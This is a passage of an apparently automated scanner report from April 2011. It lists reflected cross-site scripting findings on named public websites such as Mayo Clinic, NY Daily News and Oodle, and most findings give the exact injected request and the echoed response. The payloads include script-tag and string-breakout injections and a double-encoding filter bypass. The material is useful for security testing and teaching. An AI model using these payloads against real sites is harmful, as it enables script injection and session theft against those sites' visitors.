This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4257a"-alert(1)-"d960cce6c75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 13:34:25 +0000
ETag: "1301751265"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1769286479
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:34:26 GMT
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/4257a"-alert(1)-"d960cce6c75";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...
6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 was submitted in the REST URL parameter 1. This input was echoed as e0c3e';alert(1)//0eb65c39a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icoe0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:26:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6783630;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: CFTOKEN=43948287;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: JSESSIONID=c230d0ddc76e41291cab3c2c7e2138772567;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.icoe0c3e';alert(1)//0eb65c39a2=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   fun
...[SNIP]...
6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4174f'%3balert(1)//b235c779868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4174f';alert(1)//b235c779868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4174f'%3balert(1)//b235c779868=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56390739;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: CFTOKEN=78178525;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: JSESSIONID=8030c0b06e9348c9e386246d2c3415127262;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
;
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.ico?4174f';alert(1)//b235c779868=1=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   f
...[SNIP]...
6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506b0"-alert(1)-"3c6201fb7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=21707428;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: CFTOKEN=48294501;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: JSESSIONID=f4308d3d1a40fd31ab3b9122d75b4ba1b687;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:"6035818",
c3:"6035818",
c4:"http://www.mayoclinic.com/invoke.cfm?b404=1?404;http://www.mayoclinic.com:80/favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...
6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f883"><script>alert(1)</script>a6bf2b66203 was submitted in the REST URL parameter 1. This input was echoed as 3f883\"><script>alert(1)</script>a6bf2b66203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f883"><script>alert(1)</script>a6bf2b66203 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=3qrq02pgj5elgfbk68038olr35; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:18:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
<form method="post" action="http://www.mediaite.com/favicon.ico3f883\"><script>alert(1)</script>a6bf2b66203/?_login=25c119c94d">
...[SNIP]...
6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><script>alert(1)</script>c2b107df494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6b98"><script>alert(1)</script>c2b107df494 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsGU2XK3CFuGIzAy+8Ag==; expires=Sun, 01-Apr-12 13:58:08 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="returnurl" value="/favicon.icob6b98"><script>alert(1)</script>c2b107df494" />
...[SNIP]...
6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34891</script><script>alert(1)</script>e1ff6838de9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34891</script><script>alert(1)</script>e1ff6838de9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsK02XK35zo0P8Azz5Ag==; expires=Sun, 01-Apr-12 13:58:22 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
_dadanet.registerStartup(
['classes/FormManager', 'classes/CommObjects'],
function()
{
var co_opts = {


uri: 'http://www.motime.com/favicon.ico34891</script><script>alert(1)</script>e1ff6838de9',
dict:{
'op_in_progress_desc': '',
'is_friend': 'We are friends',
'invite_already_send': 'Invite already sent',
'invite_send': 'Invitation sent',
'invite_blocked': 'Invites blocked by user',
'is_fan'
...[SNIP]...
6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cb45a<script>alert(1)</script>f364086cc64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb45a<script>alert(1)</script>f364086cc64 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /favicon.icocb45a<script>alert(1)</script>f364086cc64 not found!</h1>
...[SNIP]...
6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd99"><script>alert(1)</script>c02e519161c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodcd99"><script>alert(1)</script>c02e519161c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/favicon.icodcd99"><script>alert(1)</script>c02e519161c', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...
6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8634e</script><script>alert(1)</script>11bc3873d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=ee713ae5dfb322af6abdeece0ada1b4e; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
pe="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...
6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255ec'%3b8d549cf0020 was submitted in the REST URL parameter 1. This input was echoed as 255ec';8d549cf0020 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /255ec'%3b8d549cf0020 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:36:40 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/255ec'%3b8d549cf0020
RealServer: prodweb4
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:36:42 GMT
Date: Sat, 02 Apr 2011 13:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript">refresh_rate = 1;
hbx_ad_refresh_page = 'index';
hbx_ad_refresh_apath = '_255ec';8d549cf0020';</script>
...[SNIP]...
6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d9"><a>3ddeb7ae6ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /175d9"><a>3ddeb7ae6ca HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:35:32 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/175d9"><a>3ddeb7ae6ca
Realserver: prodweb12
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:35 GMT
Date: Sat, 02 Apr 2011 13:35:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src="http://pixel.quantserve.com/pixel/p-84eTroxoNX3JE.gif?labels=MYLT:175d9"><a>3ddeb7ae6ca" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
...[SNIP]...
6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3df4'%3balert(1)//2457915afd7 was submitted in the REST URL parameter 1. This input was echoed as c3df4';alert(1)//2457915afd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc3df4'%3balert(1)//2457915afd7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:42 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 71163
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:24:23 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.icoc3df4';alert(1)//2457915afd7';
}
//-->
...[SNIP]...
6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee3e"-alert(1)-"d0aa2d773ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodee3e"-alert(1)-"d0aa2d773ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:48 GMT
Content-Length: 23641
Connection: close
Set-Cookie: otu=f0124679080472be32101e034bba68c0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=c3f05fa9a6a425c696068891ef99e4ef; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMkY4MTExRTREOTcyNjcw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds favicon.icodee3e"-alert(1)-"d0aa2d773ae","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...
6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141c5"><script>alert(1)</script>d6b037b25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico141c5"><script>alert(1)</script>d6b037b25fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:47 GMT
Content-Length: 23718
Connection: close
Set-Cookie: otu=4d4e452f05e3458af8c7091581577bcf; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=f396da894437be11c53e9aafdb5d3381; path=/; domain=.oodle.com
Set-Cookie: a=dT1BNUUwMDhCMDREOTcyNjZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/favicon.ico141c5"><script>alert(1)</script>d6b037b25fc" />
...[SNIP]...
6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c04d7'><script>alert(1)</script>f4fdd867ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90396


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0' property='og:url'/>
...[SNIP]...
6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee0cd'%3bcb0a88443c6 was submitted in the REST URL parameter 1. This input was echoed as ee0cd';cb0a88443c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoee0cd'%3bcb0a88443c6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:01 GMT
Server: Apache
